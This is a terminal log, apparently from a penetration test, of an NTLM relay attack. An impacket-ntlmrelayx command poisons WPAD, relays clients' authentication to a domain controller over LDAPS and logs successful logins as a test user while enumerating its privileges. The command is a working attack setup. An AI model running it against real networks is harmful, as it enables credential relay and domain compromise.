impacket-ntlmrelayx -6 -t ldaps://1x.xx.xx.x1 -wh fakewpad.test.redacted.site -l lootme
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.xx.1xx
[*] SMBD-Thread-6 (process_request_thread): Received connection from ::ffff:1xx.xx.xx.xx, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.x.xx
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Connection from ::ffff: 1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
<--snip-->